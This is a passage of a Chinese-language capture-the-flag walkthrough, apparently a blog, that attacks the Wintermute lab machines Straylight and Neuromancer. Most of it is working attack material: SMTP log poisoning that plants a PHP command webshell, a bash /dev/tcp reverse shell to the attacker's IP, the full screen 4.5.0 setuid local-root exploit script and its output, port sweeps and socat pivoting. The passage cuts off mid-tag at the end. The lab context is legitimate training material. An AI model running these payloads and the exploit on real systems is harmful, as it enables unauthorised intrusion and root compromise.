src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849264.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303015656924\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5\u65e5\u5fd7\u6ce8\u5165<\/h3>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u76ee\u5f55\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u7a7f\u8d8a\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.244.130\/turing-bolo\/bolo.php?bolo=..\/..\/..\/log\/mail<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849265.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849265.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303020108527\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u4e86\u90ae\u7bb1\u670d\u52a1\u7591\u4f3c<code>postfix<\/code>\uff0c\u6682\u65f6\u5148\u4e0d\u67e5\u8fd9\u4e2a\u7684\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u65e5\u5fd7\u5305\u542b\uff0c\u9996\u5148\u9700\u8981\u4f20\u4e00\u4e2a\u9a6c\u4e0a\u53bb\uff0c\u770b\u5230\u5f00\u542f\u4e86<code>smtp<\/code>\u670d\u52a1\uff1a<\/p>\n<pre><code class=\"language-apl\">nc 192.168.244.130 25\n# telnet 192.168.244.130 25\nHELO hack\nMAIL FROM:&lt;hack@gmail.com&gt;\nRCPT TO:&lt;?php system(&#039;whoami&#039;); ?&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849266.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849266.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303143329053\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\/turing-bolo\/bolo.php?bolo=\/var\/log\/mail<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849267.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849267.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303143122442\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c\uff1a<\/p>\n<pre><code class=\"language-smtp\">telnet 192.168.244.130 25\nHELO ctfer\nMAIL FROM: ctfer@gmail.com\nRCPT TO: wintermute\nsubject: &lt;?php system($_REQUEST[&#039;ctf&#039;]);?&gt;\n.\nquit<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849268.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849268.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303152422504\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5f39\u4e2a\u53cd\u5411shell\uff1a<\/p>\n<pre><code class=\"language-bash\">bash -c &quot;bash -i &gt;&amp; \/dev\/tcp\/192.168.244.132\/1234 0&gt;&amp;1&quot;\nbash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.244.132%2f1234+0%3e%261%22<\/code><\/pre>\n<pre><code class=\"language-bash\">http:\/\/192.168.244.130\/turing-bolo\/bolo.php?bolo=\/var\/log\/mail&amp;ctf=bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.244.132%2f1234+0%3e%261%22<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849269.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849269.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303153528246\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u83b7\u53d6\u5230\u4e86\u4e00\u4e2ashell\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u5148\u67e5\u770b\u4e00\u4e0bsuid\u6587\u4ef6<\/h3>\n<pre><code class=\"language-bash\">find \/ -perm -4000 2&gt;\/dev\/null<\/code><\/pre>\n<pre><code class=\"language-apl\">\/bin\/su\n\/bin\/umount\n\/bin\/mount\n\/bin\/screen-4.5.0\n\/bin\/ping\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign<\/code><\/pre>\n<p>\u4f3c\u4e4e<code>screen<\/code>\u53ef\u4ee5\u5229\u7528\uff0c\u67e5\u770b\u4e00\u4e0b<code>sudo screen<\/code>\uff0c\u53d1\u73b0\u6ca1\u6709<code>sudo<\/code>\u547d\u4ee4\uff1a<\/p>\n<h3>\u68c0\u6d4bscreen 4.5\u6f0f\u6d1e<\/h3>\n<p>\u67e5\u770b\u4e00\u4e0b\u6f0f\u6d1e<\/p>\n<pre><code class=\"language-bash\">searchsploit screen 4.5.0<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849270.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849270.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303154926642\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">searchsploit -m linux\/local\/41154.sh <\/code><\/pre>\n<pre><code class=\"language-sh\">#!\/bin\/bash                                                                                 \n# screenroot.sh                                                                             \n# setuid screen v4.5.0 local root exploit                                                   \n# abuses ld.so.preload overwriting to get root.                                             \n# bug: https:\/\/lists.gnu.org\/archive\/html\/screen-devel\/2017-01\/msg00025.html                \n# HACK THE PLANET                                                                           \n# ~ infodox (25\/1\/2017)                                                                     \necho &quot;~ gnu\/screenroot ~&quot;                                                                   \necho &quot;[+] First, we create our shell and library...&quot;                                        \ncat &lt;&lt; EOF &gt; \/tmp\/libhax.c                                                                  \n#include &lt;stdio.h&gt;                                                                          \n#include &lt;sys\/types.h&gt;                                                                      \n#include &lt;unistd.h&gt;                                                                         \n__attribute__ ((__constructor__))                                                           \nvoid dropshell(void){                         \n    chown(&quot;\/tmp\/rootshell&quot;, 0, 0);\n    chmod(&quot;\/tmp\/rootshell&quot;, 04755);\n    unlink(&quot;\/etc\/ld.so.preload&quot;);  \n    printf(&quot;[+] done!\\n&quot;);       \n}                                             \nEOF\ngcc -fPIC -shared -ldl -o \/tmp\/libhax.so \/tmp\/libhax.c\nrm -f \/tmp\/libhax.c                                                                         \ncat &lt;&lt; EOF &gt; \/tmp\/rootshell.c\n#include &lt;stdio.h&gt;                            \nint main(void){   \n    setuid(0); \n    setgid(0);\n    seteuid(0);\n    setegid(0);\n    execvp(&quot;\/bin\/sh&quot;, NULL, NULL);\n}                              \nEOF                                           \ngcc -o \/tmp\/rootshell \/tmp\/rootshell.c\nrm -f \/tmp\/rootshell.c                        \necho &quot;[+] Now we create our \/etc\/ld.so.preload file...&quot;\ncd \/etc                                       \numask 000 # because                           \nscreen -D -m -L ld.so.preload echo -ne  &quot;\\x0a\/tmp\/libhax.so&quot; # newline needed\necho &quot;[+] Triggering...&quot;\nscreen -ls # screen itself is setuid, so...\n\/tmp\/rootshell   <\/code><\/pre>\n<p>\u6309\u7167\u8fd9\u4e2a\u811a\u672c\u5148\u8bd5\u4e00\u4e0b\uff0c\u5176\u5927\u81f4\u903b\u8f91\u5728\u4e8e\u521b\u5efa\u4e24\u4e2ac\u6587\u4ef6\uff0c\u518d\u8fdb\u884c\u7f16\u8bd1\u6267\u884c\u547d\u4ee4\uff0c\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\npython3 -m http.server 8888\n# wintermute\nwget http:\/\/192.168.244.132:8888\/41154.sh\nchmod +x 41154.sh\n.\/41154.ssh<\/code><\/pre>\n<pre><code class=\"language-text\">~ gnu\/screenroot ~                                                                         \n[+] First, we create our shell and library...                                              \n\/tmp\/libhax.c: In function &#039;dropshell&#039;:                                                    \n\/tmp\/libhax.c:7:5: warning: implicit declaration of function &#039;chmod&#039; [-Wimplicit-function-declaration]\n     chmod(&quot;\/tmp\/rootshell&quot;, 04755);                                                       \n     ^~~~~ \n\/tmp\/rootshell.c: In function &#039;main&#039;:\n\/tmp\/rootshell.c:3:5: warning: implicit declaration of function &#039;setuid&#039; [-Wimplicit-function-declaration]\n     setuid(0);                              \n     ^~~~~~                                                                                \n\/tmp\/rootshell.c:4:5: warning: implicit declaration of function &#039;setgid&#039; [-Wimplicit-function-declaration]\n     setgid(0);\n     ^~~~~~\n\/tmp\/rootshell.c:5:5: warning: implicit declaration of function &#039;seteuid&#039; [-Wimplicit-function-declaration]\n     seteuid(0);\n     ^~~~~~~   \n\/tmp\/rootshell.c:6:5: warning: implicit declaration of function &#039;setegid&#039; [-Wimplicit-function-declaration]\n     setegid(0);                                                                           \n     ^~~~~~~    \n\/tmp\/rootshell.c:7:5: warning: implicit declaration of function &#039;execvp&#039; [-Wimplicit-function-declaration]\n     execvp(&quot;\/bin\/sh&quot;, NULL, NULL);           \n     ^~~~~~                                   \n[+] Now we create our \/etc\/ld.so.preload file...                                            \n[+] Triggering...                             \n&#039; from \/etc\/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.    \n[+] done!                                     \nNo Sockets found in \/tmp\/screens\/S-www-data.<\/code><\/pre>\n<p>\u8fd9\u8fb9\u7684\u62a5\u9519\u5b9e\u9645\u4e0a\u662f\u53ef\u4ee5\u51cf\u5c11\u7684\uff0c\u8fd0\u884c\u4ee5\u4e0bsed\u547d\u4ee4\u5c06\u811a\u672c\u683c\u5f0f\u6362\u884c\u548c\u7f29\u8fdb\u8f6c\u5316\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">sed -i -e &#039;s\/\\r$\/\/&#039; 41154.sh<\/code><\/pre>\n<ul>\n<li><code>-i<\/code>: \u8fd9\u4e2a\u9009\u9879\u544a\u8bc9sed\u5728\u6587\u4ef6\u4e2d\u76f4\u63a5\u8fdb\u884c\u4fee\u6539\uff0c\u800c\u4e0d\u662f\u8f93\u51fa\u5230\u6807\u51c6\u8f93\u51fa\u8bbe\u5907\u3002<\/li>\n<li><code>-e &#039;s\/\\r$\/\/&#039;<\/code>: \u8fd9\u662fsed\u7684\u7f16\u8f91\u547d\u4ee4\u3002\u5728\u8fd9\u4e2a\u547d\u4ee4\u4e2d\uff0c<code>s<\/code> \u8868\u793a\u8fdb\u884c\u66ff\u6362\u64cd\u4f5c\uff0c<code>\\r$<\/code> \u8868\u793a\u4ee5\u56de\u8f66\u7b26\u7ed3\u5c3e\u7684\u884c\uff08\u5728Unix\u7cfb\u7edf\u4e2d\u901a\u5e38\u4e0d\u4f7f\u7528\u56de\u8f66\u7b26\uff09\uff0c<code>\/\/<\/code> \u8868\u793a\u66ff\u6362\u4e3a\u7a7a\uff0c\u5373\u5220\u9664\u56de\u8f66\u7b26\u3002<\/li>\n<\/ul>\n<p>\u8f93\u5165\u547d\u4ee4\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root),33(www-data)<\/code><\/pre>\n<p>\u83b7\u53d6\u5230\u4e86flag\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u4f5c\u8005\u7559\u7ed9\u6211\u4eec\u5565\u7ebf\u7d22\uff1a<\/p>\n<pre><code class=\"language-apl\">ls -la \/root<\/code><\/pre>\n<pre><code class=\"language-text\">total 52\ndrwx------  4 root root  4096 Jul  3  2018 .\ndrwxr-xr-x 23 root root  4096 May 12  2018 ..\n-rw-------  1 root root     0 Jul  3  2018 .bash_history\n-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc\ndrwxr-xr-x  2 root root  4096 May 12  2018 .nano\n-rw-r--r--  1 root root   148 Aug 17  2015 .profile\n-rw-r--r--  1 root root    66 May 12  2018 .selected_editor\n-rw-------  1 root root 12459 Jul  3  2018 .viminfo\n-rw-------  1 root root    33 Jul  1  2018 flag.txt\n-rw-------  1 root root   778 Jul  1  2018 note.txt\ndrwxr-xr-x  2 root root  4096 May 12  2018 scripts<\/code><\/pre>\n<pre><code class=\"language-apl\">cat \/root\/flag.txt<\/code><\/pre>\n<pre><code class=\"language-text\">5ed185fd75a8d6a7056c96a436c6d8aa<\/code><\/pre>\n<pre><code class=\"language-apl\">cat \/root\/note.txt<\/code><\/pre>\n<pre><code class=\"language-text\">Devs,\n\nLady 3Jane has asked us to create a custom java app on Neuromancer&#039;s primary server to help her interact w\/ the AI via a web-based GUI.\n\nThe engineering team couldn&#039;t strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.\n\nAnyways, we&#039;ve deployed the war file on tomcat as ordered - located here:\n\n\/struts2_2.3.15.1-showcase\n\nIt&#039;s ready for the devs to customize to her liking...I&#039;m stating the obvious, but make sure to secure this thing.\n\nRegards,\n\nBob Laugh\nTuring Systems Engineer II\nFreeside\/\/Straylight\/\/Ops5<\/code><\/pre>\n<p>\u8fd9\u91cc\u6cc4\u9732\u4e86\u7ec4\u4ef6\u4fe1\u606f<code>struts2_2.3.15.1-showcase<\/code>\uff0c\u7b49\u4e0b\u53ef\u4ee5\u5c1d\u8bd5\u4ece\u8fd9\u91cc\u5165\u624b\uff01<\/p>\n<h1>Neuromancer<\/h1>\n<h2>\u6269\u5c55\u4e00\u4e0bshell<\/h2>\n<pre><code class=\"language-bash\">python -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;<\/code><\/pre>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u4e3b\u673a\u63a2\u6d4b\uff08\u914d\u7f6e\u5931\u8d25\uff09<\/h3>\n<h4>ifconfig<\/h4>\n<pre><code class=\"language-apl\">ifconfig<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849271.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141849271.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240303172302935\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>arp<\/h4>\n<pre><code class=\"language-apl\">arp -a<\/code><\/pre>\n<pre><code class=\"language-text\">? (192.168.244.132) at 08:00:27:99:84:97 [ether] on enp0s8\n? (192.168.244.132) at 08:00:27:99:84:97 [ether] on enp0s3\n? (192.168.244.128) at 08:00:27:14:96:11 [ether] on enp0s8\n? (192.168.244.128) at 08:00:27:14:96:11 [ether] on enp0s3<\/code><\/pre>\n<h4>shell\u811a\u672c<\/h4>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n# \u6307\u5b9a\u8981\u626b\u63cf\u7684\u7f51\u6bb5\uff0c\u4f8b\u5982\uff1a192.168.244.0\/24\nsubnet=&quot;10.0.2.0\/24&quot;\necho &quot;\u63a2\u6d4b\u5b58\u6d3b\u4e3b\u673a\u4e2d...&quot;\n# \u5faa\u73af\u904d\u5386\u7f51\u6bb5\u4e2d\u7684\u6bcf\u4e2aIP\u5730\u5740\nfor ip in $(seq 1 254); do\n    target=&quot;$subnet.$ip&quot;\n    # \u53d1\u9001\u5355\u4e2aping\u8bf7\u6c42\uff0c\u5e76\u4e22\u5f03\u6807\u51c6\u8f93\u51fa\u548c\u6807\u51c6\u9519\u8bef\uff0c\u53ea\u4fdd\u7559\u9000\u51fa\u72b6\u6001\u7801\n    ping -c 1 -W 1 &quot;$target&quot; &gt;\/dev\/null 2&gt;&amp;1\n    # \u68c0\u67e5ping\u547d\u4ee4\u7684\u9000\u51fa\u72b6\u6001\u7801\n    if [ $? -eq 0 ]; then\n        echo &quot;$target \u5b58\u6d3b&quot;\n    fi\ndone\necho &quot;\u63a2\u6d4b\u5b8c\u6210&quot;<\/code><\/pre>\n<h1>\u91cd\u65b0\u914d\u7f6e<\/h1>\n<p>\u8fd9\u91cc\u7f51\u5361\u626b\u5b8c\u4ee5\u540e\uff0c\u53d1\u73b0\u6709\u7684\u6ca1\u626b\u5230\uff0c\u91cd\u65b0\u914d\u7f6e\u4e86\u4e00\u4e0b\u9776\u673a\uff0c\u5982\u679c\u6210\u529f\u4e86\uff0c\u540e\u9762\u518d\u628a\u914d\u7f6e\u8d34\u8fdb\u6765\u3002<\/p>\n<p>\u56e0\u4e3a\u8981\u91cd\u65b0\u914d\u7f6e\u4e00\u904d\u9776\u573a\uff0c\u5c06\u4e4b\u524d\u7684\u6b65\u9aa4\u53d8\u6210\u7b80\u6613\u7684\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-bash\">telnet 10.161.61.130 25\nHELO ctfer\nMAIL FROM: ctfer@gmail.com\nRCPT TO: wintermute\nsubject: &lt;?php system($_REQUEST[&#039;ctf&#039;]);?&gt;\n.\nquit\nhttp:\/\/10.161.61.130\/turing-bolo\/bolo.php?bolo=\/var\/log\/mail&amp;ctf=bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f10.161.61.128%2f1234+0%3e%261%22<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[\/tmp]\n\u2514\u2500$ nc -lvnp 1234\nlistening on [any] 1234 ...\nconnect to [10.161.61.128] from (UNKNOWN) [10.161.61.130] 45876\nbash: cannot set terminal process group (642): Inappropriate ioctl for device\nbash: no job control in this shell\nwww-data@straylight:\/var\/www\/html\/turing-bolo$ cd \/tmp\ncd \/tmp\nwww-data@straylight:\/tmp$ ls\nls\n41154.sh\nlibhax.so\nrootshell\nscreens\nvGdtL8p\nwww-data@straylight:\/tmp$ .\/rootshell\n.\/rootshell\nwhoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root),33(www-data)\npython -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;\nroot@straylight:\/tmp# ifconfig\nifconfig\nenp0s3: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 10.161.61.130  netmask 255.255.255.0  broadcast 10.161.61.255\n        inet6 fe80::a00:27ff:fe8f:6d52  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:8f:6d:52  txqueuelen 1000  (Ethernet)\n        RX packets 5311  bytes 484772 (473.4 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 1186  bytes 82951 (81.0 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nenp0s8: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 10.0.2.5  netmask 255.255.255.0  broadcast 10.0.2.255\n        inet6 fe80::a00:27ff:fe79:202d  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:79:20:2d  txqueuelen 1000  (Ethernet)\n        RX packets 55  bytes 8493 (8.2 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 70  bytes 6905 (6.7 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nlo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536\n        inet 127.0.0.1  netmask 255.0.0.0\n        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;\n        loop  txqueuelen 1  (Local Loopback)\n        RX packets 13058  bytes 1348746 (1.2 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 13058  bytes 1348746 (1.2 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nroot@straylight:\/tmp# ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:8f:6d:52 brd ff:ff:ff:ff:ff:ff\n    inet 10.161.61.130\/24 brd 10.161.61.255 scope global enp0s3\n       valid_lft forever preferred_lft forever\n    inet6 fe80::a00:27ff:fe8f:6d52\/64 scope link \n       valid_lft forever preferred_lft forever\n3: enp0s8: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:79:20:2d brd ff:ff:ff:ff:ff:ff\n    inet 10.0.2.5\/24 brd 10.0.2.255 scope global enp0s8\n       valid_lft forever preferred_lft forever\n    inet6 fe80::a00:27ff:fe79:202d\/64 scope link \n       valid_lft forever preferred_lft forever\n<\/code><\/pre>\n<pre><code class=\"language-text\">for i in $(seq 1 65535); do nc -nvz -w 1 10.0.2.3 $i 2&gt;&amp;1; done | grep -v &quot;Connection refused&quot;\nfor i in {1..254} ;do (ping -c 1 10.161.61.$i | grep &quot;bytes from&quot; &amp;) ;done\nfor i in $(seq 1 65535); do nc -nvz -w 1 192.168.244.3 $i 2&gt;&amp;1; done | grep -v &quot;Connection refused&quot;<\/code><\/pre>\n<p>\u6309\u7406\u8bf4\u8fd9\u4e9b\u505a\u6cd5\u662f\u5bf9\u7684\uff0c\u4f46\u662f\u6211\u5c31\u662f\u626b\u4e0d\u51fa\u6765\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\u3002<\/p>\n<h1>\u9776\u573a\u914d\u7f6e\u95ee\u9898\uff0c\u65e0\u6cd5\u505a\u51fa\u6765\u770bwp\u5b66\u4e60\u63a5\u4e0b\u6765\u7684\u601d\u8def<\/h1>\n<p>\u6b63\u5e38\u7684\u8bdd\u53ef\u4ee5\u626b\u51fa\u4e09\u4e2a\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-text\">(UNKNOWN) [192.168.56.110] 8009 (?) open\n(UNKNOWN) [192.168.56.110] 8080 (http-alt) open\n(UNKNOWN) [192.168.56.110] 34483 (?) open<\/code><\/pre>\n<p>\u8bbf\u95ee\u770b\u4e0d\u5230\u4e1c\u897f\uff0c\u5fc5\u987b\u7aef\u53e3\u8f6c\u53d1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">socat TCP-LISTEN:8009,fork,reuseaddr tcp:192.168.56.110:8009 &amp;\nsocat TCP-LISTEN:8000,fork,reuseaddr tcp:192.168.56.110:8080 &amp;\nsocat TCP-LISTEN:34483,fork,reuseaddr tcp:192.168.56.110:34483 &amp;<\/code><\/pre>\n<p>\u7136\u540enmap\u626b\u63cf\uff0c\u5e76\u5229\u7528\u81ea\u5e26\u7684\u811a\u672c\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-bash\">nmap -sV -v -p 8009,8080,34483 -Pn -A --script=vuln 192.168.56.110<\/code><\/pre>\n<p>\u8bbf\u95ee\uff1a<\/p>\n<pre><code 